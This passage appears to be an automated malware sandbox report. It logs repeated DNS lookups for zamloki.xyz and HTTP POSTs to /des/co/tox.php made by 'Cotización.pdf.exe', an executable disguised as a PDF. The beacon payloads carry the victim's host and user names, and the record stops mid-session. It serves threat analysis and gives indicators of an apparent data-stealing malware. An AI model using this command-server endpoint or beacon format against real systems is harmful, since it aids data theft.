                                    Jul 21, 2021 17:03:03.275046110 CEST5098953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:03.287558079 CEST53509898.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:03.922496080 CEST5332353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:03.935904980 CEST53533238.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:04.469043970 CEST5903453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:04.481213093 CEST53590348.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:05.002077103 CEST5310653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:05.015263081 CEST53531068.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:05.525885105 CEST6213253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:05.538188934 CEST53621328.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:06.172590971 CEST5448953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:06.184719086 CEST53544898.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:06.739574909 CEST6439053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:06.752397060 CEST53643908.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:07.224699974 CEST5836953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:07.238719940 CEST53583698.8.8.8192.168.2.3

                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Jul 21, 2021 17:03:03.275046110 CEST192.168.2.38.8.8.80xd493Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.922496080 CEST192.168.2.38.8.8.80x7c6aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:04.469043970 CEST192.168.2.38.8.8.80x9873Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.002077103 CEST192.168.2.38.8.8.80xcafeStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.525885105 CEST192.168.2.38.8.8.80x5fd9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.172590971 CEST192.168.2.38.8.8.80x957bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.739574909 CEST192.168.2.38.8.8.80xfcc3Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:07.224699974 CEST192.168.2.38.8.8.80xb09fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)

                                    DNS Answers

                                    Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class
                                    Jul 21, 2021 17:02:43.516379118 CEST8.8.8.8192.168.2.30x948aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.257256031 CEST8.8.8.8192.168.2.30x65c1No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.257256031 CEST8.8.8.8192.168.2.30x65c1No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.887240887 CEST8.8.8.8192.168.2.30x61abNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.887240887 CEST8.8.8.8192.168.2.30x61abNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:45.844196081 CEST8.8.8.8192.168.2.30xabeaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:45.844196081 CEST8.8.8.8192.168.2.30xabeaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:47.487322092 CEST8.8.8.8192.168.2.30x3c67No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:47.487322092 CEST8.8.8.8192.168.2.30x3c67No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.029633999 CEST8.8.8.8192.168.2.30xea46No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.029633999 CEST8.8.8.8192.168.2.30xea46No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.586707115 CEST8.8.8.8192.168.2.30x99efNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.586707115 CEST8.8.8.8192.168.2.30x99efNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.177376032 CEST8.8.8.8192.168.2.30xe5efNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.177376032 CEST8.8.8.8192.168.2.30xe5efNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.780042887 CEST8.8.8.8192.168.2.30x795aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.780042887 CEST8.8.8.8192.168.2.30x795aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:50.466878891 CEST8.8.8.8192.168.2.30x5561No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:50.466878891 CEST8.8.8.8192.168.2.30x5561No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.118927002 CEST8.8.8.8192.168.2.30x3981No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.118927002 CEST8.8.8.8192.168.2.30x3981No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.593761921 CEST8.8.8.8192.168.2.30x5ffdNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.593761921 CEST8.8.8.8192.168.2.30x5ffdNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.197248936 CEST8.8.8.8192.168.2.30x7828No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.197248936 CEST8.8.8.8192.168.2.30x7828No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.984622955 CEST8.8.8.8192.168.2.30x32eaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.984622955 CEST8.8.8.8192.168.2.30x32eaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:53.471581936 CEST8.8.8.8192.168.2.30x8182No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:53.471581936 CEST8.8.8.8192.168.2.30x8182No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.031950951 CEST8.8.8.8192.168.2.30x68c9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.031950951 CEST8.8.8.8192.168.2.30x68c9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.561252117 CEST8.8.8.8192.168.2.30x6d71No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.561252117 CEST8.8.8.8192.168.2.30x6d71No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.061321020 CEST8.8.8.8192.168.2.30x20fdNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.061321020 CEST8.8.8.8192.168.2.30x20fdNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.610295057 CEST8.8.8.8192.168.2.30xef86No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.610295057 CEST8.8.8.8192.168.2.30xef86No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.148770094 CEST8.8.8.8192.168.2.30xa089No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.148770094 CEST8.8.8.8192.168.2.30xa089No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.662772894 CEST8.8.8.8192.168.2.30xef9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.662772894 CEST8.8.8.8192.168.2.30xef9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.174108982 CEST8.8.8.8192.168.2.30xc904No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.174108982 CEST8.8.8.8192.168.2.30xc904No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.670877934 CEST8.8.8.8192.168.2.30x2c5eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.670877934 CEST8.8.8.8192.168.2.30x2c5eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.167531013 CEST8.8.8.8192.168.2.30x769No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.167531013 CEST8.8.8.8192.168.2.30x769No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.735698938 CEST8.8.8.8192.168.2.30x5a80No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.735698938 CEST8.8.8.8192.168.2.30x5a80No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.277935982 CEST8.8.8.8192.168.2.30x95ddNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.277935982 CEST8.8.8.8192.168.2.30x95ddNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.860639095 CEST8.8.8.8192.168.2.30x5681No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.860639095 CEST8.8.8.8192.168.2.30x5681No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.452721119 CEST8.8.8.8192.168.2.30x176bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.452721119 CEST8.8.8.8192.168.2.30x176bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.975579023 CEST8.8.8.8192.168.2.30x26daNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.975579023 CEST8.8.8.8192.168.2.30x26daNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:01.626866102 CEST8.8.8.8192.168.2.30x7c77No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:01.626866102 CEST8.8.8.8192.168.2.30x7c77No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.148718119 CEST8.8.8.8192.168.2.30xcb7bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.148718119 CEST8.8.8.8192.168.2.30xcb7bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.748351097 CEST8.8.8.8192.168.2.30xa7abNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.748351097 CEST8.8.8.8192.168.2.30xa7abNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.287558079 CEST8.8.8.8192.168.2.30xd493No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.287558079 CEST8.8.8.8192.168.2.30xd493No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.935904980 CEST8.8.8.8192.168.2.30x7c6aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.935904980 CEST8.8.8.8192.168.2.30x7c6aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:04.481213093 CEST8.8.8.8192.168.2.30x9873No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:04.481213093 CEST8.8.8.8192.168.2.30x9873No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.015263081 CEST8.8.8.8192.168.2.30xcafeNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.015263081 CEST8.8.8.8192.168.2.30xcafeNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.538188934 CEST8.8.8.8192.168.2.30x5fd9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.538188934 CEST8.8.8.8192.168.2.30x5fd9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.184719086 CEST8.8.8.8192.168.2.30x957bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.184719086 CEST8.8.8.8192.168.2.30x957bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.752397060 CEST8.8.8.8192.168.2.30xfcc3No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.752397060 CEST8.8.8.8192.168.2.30xfcc3No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:07.238719940 CEST8.8.8.8192.168.2.30xb09fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:07.238719940 CEST8.8.8.8192.168.2.30xb09fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • zamloki.xyz

                                    HTTP Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.3 | 49727 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:47.860769987 CEST | 1275 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 190
                                    Connection: close
                                    Jul 21, 2021 17:01:47.881434917 CEST | 1275 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: 'ckav.ruhardz367706DESKTOP-716T771k08F9C4E9C79A3B52B3F7394305tmTK
                                    Jul 21, 2021 17:01:48.154939890 CEST | 1276 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HCu%2BWGot2zpuW5laOc7rLI1l39a6SyWqikMVOpRxztbOUiIp6KZym9YNZO2pIMknfIVVsEI5nQEXhP26PTd67znu106LUnLvFFIGSw28Cq2kLuLTIuTufHdPgO%2FCsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e7e3d562b65-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    1 | 192.168.2.3 | 49728 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:48.486706972 CEST | 1277 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 190
                                    Connection: close
                                    Jul 21, 2021 17:01:48.508766890 CEST | 1277 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: 'ckav.ruhardz367706DESKTOP-716T771+08F9C4E9C79A3B52B3F739430jFqt5
                                    Jul 21, 2021 17:01:48.781194925 CEST | 1278 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CSn4M7fCN11JsIWqkm8nhunsG5RHhN6U%2F%2BAwfFBVksWYm8PWZNrgMdUI02k%2B6sqw2R7H9q7UTIH50n7CFVJaqG8hO%2BQB3APz%2FLctzm%2FK97r9Zws7T3zt5w8i4iZx5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e821c0d4e6d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    10 | 192.168.2.3 | 49738 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:53.544702053 CEST | 1296 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:53.564991951 CEST | 1296 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:53.822968006 CEST | 1297 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V57jX5VYJaOcQlUluPRTvrIVMaVARwz69gauN6Up8Cw1AX%2B9cz4qTO%2BicNwUTKRPoHca%2BJXzp5ICdOn3jBhymYWkwbXODOqCK5L6J65fncgo3FujPBgG6olbKdCVCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ea1bd8b4e8c-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    100 | 192.168.2.3 | 49839 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:45.875520945 CEST | 5667 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:45.898169994 CEST | 5667 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:46.144359112 CEST | 5668 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bubj8xEiXcnxl3cpddT5VkciEez%2B3h1KGHxOn3UTs6uUN4qTun2zAD93d1Ajob3gDAoDF4U5iDmvn6O575rvhI4hlx7OgvrWj3nj3xh7FFYi6scnuEC9RXn4sa0mUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fe8ca5b0625-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    101 | 192.168.2.3 | 49840 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:47.515414000 CEST | 5669 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:47.535134077 CEST | 5669 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:47.794224024 CEST | 5670 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hjGG3L6oWTdypWwVRuTK083M8kS4MRK3JtFFp%2BmPMbA3vURgL5xH7kQZqboykR9w6nnn7QSGgp%2F8aj4OTVwcT4jF0JneGNr66F7EO5jlyGuTZFc170LPBS3YmWGYeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ff30eb5177e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    102 | 192.168.2.3 | 49841 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:48.052467108 CEST | 5671 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:48.070213079 CEST | 5671 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:48.326651096 CEST | 5672 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YwO2pxvbs7XqC9EMYg%2FcRXMGsgwCPXlm7FBSKYBv45YKCPRUk%2B%2FGRxEoE4v9m%2FqIeqqByynRd%2BjNCCNVYqYSf0zs82ujt54oKyAxrGCx80NXVQfa5k64qGSm%2Fr4c6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ff669f71f51-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    103 | 192.168.2.3 | 49842 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:48.613532066 CEST | 5673 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:48.633460999 CEST | 5673 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
